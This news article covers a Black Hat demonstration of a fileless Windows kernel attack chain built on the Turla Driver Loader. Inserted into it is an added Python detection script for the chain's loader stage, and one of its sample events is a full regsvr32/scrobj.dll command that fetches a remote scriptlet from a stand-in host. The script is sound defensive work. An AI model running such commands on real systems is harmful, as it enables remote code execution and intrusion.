Researchers have demonstrated a new attack method able to compromise the kernel in Windows machines.
On Thursday at the Black Hat conference in Las Vegas, researchers from cybersecurity firm Endgame demonstrated how kernel attacks can go beyond standard malware and exploits to fully compromise a Windows machine with a fileless technique.
As reported by Threat Post, during the session “Kernel Mode Threats and Practical Defenses,” senior Endgame researcher Joe Desimone demonstrated how the Turla Driver Loader could be crafted into a full, fileless kernel-mode attack.
The Turla Driver Loader (TDL), available on GitHub, is a driver loader designed to bypass Windows x64 Driver Signature Enforcement protections.
While the security measure is intended to prevent drivers loading without digital signing, according to the developers of TDL, this “ruined many freeware programs” and “didn’t fix anything in the anti-malware field,” leading to the development of the bypass.
The kernel is a critical component of any PC operating system: it is the central module of the OS and, once loaded, it stays resident in memory to manage processes and tasks.
If a threat actor gains access to the kernel, they can poke around the critical elements of an OS and perform actions that would otherwise be forbidden.
As a result, PC vendors, including Microsoft, spend a vast amount of resources protecting the kernel.
The Redmond giant has a number of protections in place, such as Kernel Patch Protection (KPP), which prevents the kernel from being patched; Driver Signature Enforcement, which only allows drivers that have been signed off by Microsoft to be loaded; and Secure Boot, which is meant to stop software other than that provided by the Original Equipment Manufacturer (OEM) from booting.
However, cyberattackers are constantly seeking new ways to compromise the kernel through malware and new attack techniques.
TDL was not crafted as a tool for threat actors, and yet, the public code can be used for a full compromise of Windows systems and the exfiltration of data.
Endgame researchers demonstrated how TDL can be used as part of an exploit chain. The hacking tools Squiblydoo/Squiblytwo and DotNetToJS can be used to execute arbitrary .NET code which maps TDL into memory without touching the disk or setting off Windows protections or antivirus software.
Once loaded into memory, TDL can exploit a signed driver and push malicious code into the kernel.
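As an added illustration of what a defender can look for in the fileless first stage of the chain described above (this is example code written for this page, not code from Endgame's talk or from TDL), the following Python script runs two heuristic checks over constructed Sysmon-style events: the regsvr32/scrobj.dll scriptlet pattern that Squiblydoo relies on, and a script host or regsvr32 loading the .NET runtime, which is how DotNetToJS-style loaders bring .NET code into a scripting process. The event field names (EventType, Image, CommandLine, ImageLoaded) and all sample events are assumptions constructed for the example.

```python
# Added example, not part of the article or of TDL: heuristic detection of the
# fileless loader stage over constructed Sysmon-style events (fields are assumed).
import re

# Interpreters that should not normally host the .NET runtime
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "regsvr32.exe"}
# Core .NET runtime modules whose load into a script host is suspicious
CLR_MODULES = {"clr.dll", "mscoree.dll"}
# regsvr32 fetching a scriptlet from a URL (the Squiblydoo shape)
SCRIPTLET_URL = re.compile(r"/i:\s*https?://")


def image_name(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_create(event):
    """Flag regsvr32 executing a remote scriptlet via scrobj.dll."""
    cmd = event.get("CommandLine", "")
    low = cmd.lower()
    if image_name(event["Image"]) == "regsvr32.exe" and "scrobj.dll" in low \
            and SCRIPTLET_URL.search(low):
        return "squiblydoo-like regsvr32 scriptlet execution: " + cmd
    return None


def check_image_load(event):
    """Flag the .NET runtime being loaded into a script host process."""
    proc = image_name(event["Image"])
    mod = image_name(event["ImageLoaded"])
    if proc in SCRIPT_HOSTS and mod in CLR_MODULES:
        return f".NET runtime ({mod}) loaded by script host {proc}"
    return None


def scan(events):
    """Run the matching check for each event and collect findings."""
    checks = {"ProcessCreate": check_process_create, "ImageLoad": check_image_load}
    findings = []
    for ev in events:
        check = checks.get(ev["EventType"])
        finding = check(ev) if check else None
        if finding:
            findings.append(finding)
    return findings


# Constructed sample events (not real telemetry); two benign, two suspicious
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s /n /u /i:http://example.invalid/a.sct scrobj.dll"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s C:\Program Files\Vendor\vendor.dll"},
    {"EventType": "ImageLoad", "Image": r"C:\Windows\System32\wscript.exe",
     "ImageLoaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"},
    {"EventType": "ImageLoad", "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
]

if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS):
        print(line)
```

Both rules are heuristics: the second in particular needs tuning against environments where legitimate scripts host .NET, so treat hits as triage leads rather than verdicts.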
The researchers say they do not know of any other teams that have created the same exploit chain for kernel compromise.
Speaking to Threat Post, Endgame researcher Gabriel Landau said: “We’re able to get full access on the machines in a very stealthy way.”
In response to such attacks, Microsoft recently launched Virtualization Based Security (VBS), which sandboxes the kernel. However, even this protection isn’t enough, as Endgame was also able to circumvent VBS to silently disable antivirus solutions.